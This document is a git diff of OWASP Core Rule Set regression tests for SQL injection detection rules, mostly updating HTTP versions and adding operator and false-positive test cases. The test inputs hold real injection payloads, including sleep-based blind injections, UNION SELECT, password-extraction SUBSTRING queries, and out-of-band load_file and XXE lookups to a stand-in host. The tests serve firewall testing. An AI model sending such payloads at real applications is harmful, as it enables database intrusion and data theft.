           log:
             expect_ids: [942101]
@@ -96,7 +96,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -112,7 +112,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/foo/24'union+all+select+1,2,3+from+aa"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -128,7 +128,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -144,7 +144,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/%2A/%2A/2+union+all/bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942101]
@@ -160,7 +160,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/foo/9'union+all/bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942101]
@@ -176,7 +176,7 @@ tests:
           method: POST
           port: 80
           uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942101]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
index 39094ed08..40cb54747 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=blahblah&var2=LIKE%20NULL"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -32,7 +32,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=RegExp"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -49,7 +49,7 @@ tests:
           port: 80
           uri: "/post"
           data: ">>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -66,7 +66,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%26%26"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -83,7 +83,7 @@ tests:
           port: 80
           uri: "/post"
           data: "<<"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -100,7 +100,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%21%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -117,7 +117,7 @@ tests:
           port: 80
           uri: "/post"
           data: "||"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -134,7 +134,7 @@ tests:
           port: 80
           uri: "/post"
           data: "XOR"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -151,7 +151,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%3C%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -168,7 +168,7 @@ tests:
           port: 80
           uri: "/post"
           data: "IS NULL"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -185,7 +185,7 @@ tests:
           port: 80
           uri: "/post"
           data: "in (0,1)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -202,7 +202,7 @@ tests:
           port: 80
           uri: "/post"
           data: "in (2147483647,-1)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -219,7 +219,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%3C%3D%3E"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -236,7 +236,7 @@ tests:
           port: 80
           uri: "/post"
           data: "regexp"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -253,7 +253,7 @@ tests:
           port: 80
           uri: "/post"
           data: "RLIKE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -270,7 +270,7 @@ tests:
           port: 80
           uri: "/post"
           data: "<>"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -287,7 +287,7 @@ tests:
           port: 80
           uri: "/post"
           data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -304,7 +304,7 @@ tests:
           port: 80
           uri: "/post"
           data: "+IN+%28815914%2C+815913%29%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -321,7 +321,7 @@ tests:
           port: 80
           uri: "/post"
           data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -338,7 +338,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay= in ( Aa,- Ab-, and Ac)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -355,7 +355,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%3E%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -372,7 +372,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -389,7 +389,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=z'or%20email%20notnull--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -406,7 +406,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -423,7 +423,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -440,7 +440,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -457,7 +457,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=user'collate%20nocase--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -474,7 +474,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=user'collate%20nocase--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -491,7 +491,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=user'collate%60nocase%60--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -508,7 +508,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=user'collate%20foo--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942120]
@@ -526,7 +526,7 @@ tests:
           uri: "/post"
           # collate`utf8mb4_general_ci`
           data: "var=user'collate%60utf8mb4_general_ci%60--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -544,7 +544,7 @@ tests:
           uri: "/post"
           # collate"\utf8mb4_general_ci"
           data: "var=user'collate%22%5Cutf8mb4_general_ci%22--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -562,7 +562,7 @@ tests:
           uri: "/post"
           # collate U&"\0441\043B\043E\043D"
           data: "var=user'collate U%26%22%241%23B%23E%23D%22--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -579,7 +579,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=%27%20notnull%20--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -596,7 +596,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
@@ -613,7 +613,7 @@ tests:
           port: 80
           uri: "/post"
           data: text=It is highly unlikely this is going to be a false positive
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942120]
@@ -665,7 +665,75 @@ tests:
             Accept: "*/*"
           method: POST
           uri: "/post/catalogue/rest/products/2499999||this.product/reviews"
-          version: HTTP/1.0
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942120]
+  - test_id: 40
+    desc: "SQL Injection Attack: SQL Operator == Detected"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "%3D%3D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942120]
+  - test_id: 41
+    desc: "SQL Injection Attack: SQL Operator ! all Detected"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "email=admin%40juice-sh.op'%20and%20email%20%21%20all%20(select%20email)--"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942120]
+  - test_id: 42
+    desc: "SQL Injection Attack: SQL Operator >= Detected"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: ">%3D"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942120]
+  - test_id: 43
+    desc: "SQL Injection Attack: SQL Operator -> Detected"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "->"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942120]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
index c4d4e9983..14b725618 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942130]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
index 421fedd10..9e573ecd0 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?sql_table=pg_catalog"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -32,7 +32,7 @@ tests:
           port: 80
           uri: "/post"
           data: "INFORMATION_SCHEMA"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -49,7 +49,7 @@ tests:
           port: 80
           uri: "/post"
           data: "database("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -66,7 +66,7 @@ tests:
           port: 80
           uri: "/post"
           data: "db_name("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -83,7 +83,7 @@ tests:
           port: 80
           uri: "/post"
           data: "DaTaBasE("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -100,7 +100,7 @@ tests:
           port: 80
           uri: "/post"
           data: "InFoRmaTioN_ScHemA"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -117,7 +117,7 @@ tests:
           port: 80
           uri: "/post"
           data: "DB_NAME("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -134,7 +134,7 @@ tests:
           port: 80
           uri: "/post"
           data: "tempdb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -151,7 +151,7 @@ tests:
           port: 80
           uri: "/post"
           data: "msdb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -168,7 +168,7 @@ tests:
           port: 80
           uri: "/post"
           data: "mysql.db"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -185,7 +185,7 @@ tests:
           port: 80
           uri: "/post"
           data: "MSysAccessObjects"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -202,7 +202,7 @@ tests:
           port: 80
           uri: "/post"
           data: "Northwind"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -219,7 +219,7 @@ tests:
           port: 80
           uri: "/post"
           data: "northwind"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -236,7 +236,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SCHEMA_NAME"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -253,7 +253,7 @@ tests:
           port: 80
           uri: "/post"
           data: "DATABASE("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -270,7 +270,7 @@ tests:
           port: 80
           uri: "/post"
           data: "schema_name"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
@@ -287,7 +287,7 @@ tests:
           port: 80
           uri: "/post"
           data: "information_schema"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942140]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
index 9f3347554..3593083b9 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=1' and sleep(9) #"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=1(select*from(select(sleep(5)))d)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=test')and (select*from(select(sleep(10)))d)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=config.ini' and sleep(91) #"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=None')and (select*from(select(sleep(10)))a)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -152,7 +152,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=file:/init.ini'.sleep(12).'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -169,7 +169,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -186,7 +186,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -203,7 +203,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -220,7 +220,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=test{${sleep(12)}}"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -237,7 +237,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -254,7 +254,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\""
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -271,7 +271,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=\\foobar.txt\" or sleep(4) #"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -288,7 +288,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -305,7 +305,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
@@ -322,7 +322,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942150]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
index cd940dd78..4a20df3e1 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Christian Folini, azurit"
+  author: "Christian Folini, azurit, Franziska Bühler"
   description: Various SQL injection tests
 rule_id: 942151
 tests:
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=foo'||(select extractvalue(xmltype('<?xml version=\"1.1\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % tocob SYSTEM \"https://unit'||'tests.coreruleset.org/\">%tocob;"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -68,12 +68,12 @@ tests:
           port: 80
           uri: "/post"
           data: "var=, FIND_IN_SET('22', Category )"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
   - test_id: 5
-    desc: "SQL injection using 'likelihood' function"
+    desc: "SQL injection using 'substring' function"
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -84,8 +84,8 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--"
-          version: HTTP/1.0
+          data: "email=%27%20AND%20SUBSTRING%28%28SELECT%20Password%20FROM%20Users%20WHERE%20Username%20%3D%20%27Administrator%27%29%2C%201%2C%201%29%20%3E%20%27m"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -102,7 +102,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -119,7 +119,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -135,7 +135,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=starts_with(password,'a')::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -151,7 +151,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -167,7 +167,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
@@ -183,7 +183,194 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=unistr(password)::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942151]
+  - test_id: 12
+    desc: "False positive with elt ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=Weitere überlieferte Bezeichnungen sind Harsle (1319), Crucesignati in Herslo (1475) und Haßelt (1599)."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 13
+    desc: "False positive with left ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=Left (WA, RR), following wood edge south (‘Restrictive Byway’/RB) for ½ mile to Pangfield Farm (564719)."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 14
+    desc: "False positive with quarter ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=One quarter (24%) of people have had an affair and cheated on a partner at some point in their lives, according to results released today."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 15
+    desc: "False positive with space ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=You can choose between front up to maximise space (ideal for art and drawing), left up (for right handed users) and right up (for left handed users)."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 16
+    desc: "False positive with likelihood ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: 'payload=A maximum of the likelihood function occurs at the same parameter-value as a maximum of the logarithm of the likelihood (the "log likelihood"), because the logarithm is an increasing function.'
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 17
+    desc: "False positive with lower ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=Below the rank of species he sometimes recognized taxa of a lower (unnamed) rank ; these have since acquired standardised names such as variety in botany and subspecies in zoology."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 18
+    desc: "False positive with convert ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=Grasshopper v1.0 made its eighth, and final, test flight on October 7, 2013, flying to an altitude of convert (0.46 miles) before making its eighth successful VTVL landing."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 19
+    desc: "False positive with position ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=In older texts printed down to c. 1630, v was used in initial position (even when it represented a vowel, e.g. in vt, later printed ut) and u was used elsewhere, e.g. in nouus, later printed novus."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 20
+    desc: "False positive with degrees ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=The measures of the interior angles of the triangle always add up to 180 degrees (same color to point out they are equal)."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 21
+    desc: "False positive with unlikely ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=There are numerous causes of asystole that may be reversible if determined quickly enough, however, survival is very unlikely (~2% if not in a hospital)."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
+  - test_id: 22
